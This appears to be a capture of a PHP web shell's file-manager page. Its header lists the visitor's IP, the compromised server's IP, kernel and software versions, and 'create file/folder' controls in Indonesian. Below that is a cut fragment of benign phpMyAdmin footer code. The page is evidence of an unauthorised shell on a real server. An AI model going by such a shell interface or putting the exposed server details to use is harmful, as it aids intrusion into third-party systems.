- Your IP: 216.73.216.37
- Server IP: 157.245.101.34
- Server: Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
- Server Software: Apache/2.4.41 (Ubuntu)
- PHP Version: 7.4.33
-
Buat File |
Buat Folder
";
}
if (! $this->_isAjax && ! $this->_isMinimal) {
if (Core::getenv('SCRIPT_NAME')
&& empty($_POST)
&& ! $this->_isAjax
) {
$url = $this->getSelfUrl();
$header = Response::getInstance()->getHeader();
$scripts = $header->getScripts()->getFiles();
$menuHash = $header->getMenu()->getHash();
// prime the client-side cache
$this->_scripts->addCode(
sprintf(
'if (! (history && history.pushState)) '
. 'PMA_MicroHistory.primer = {'
. ' url: "%s",'
. ' scripts: %s,'
. ' menuHash: "%s"'
. '};',
Sanitize::escapeJsString($url),
json_encode($scripts),
Sanitize::escapeJsString($menuHash)
)
);
}
if (Core::getenv('SCRIPT_NAME')
&& ! $this->_isAjax
) {
$url = $this->getSelfUrl();
$retval .= $this->_getSelfLink($url);
}
$this->_scripts->addCode(
'var debugSQLInfo = ' . $this->getDebugMessage() . ';'
);
$retval .= '';
$retval .= $this->getErrorMessages();
$retval .= '
';
$retval .= $this->_scripts->getDisplay();
if ($GLOBALS['cfg']['DBG']['demo']) {
$retval .= '';
$retval .= $this->_getDemoMessage();
$retval .= '
';
}
$retval .= Config::renderFooter();
}
if (! $this->_isAjax) {
$retval .= "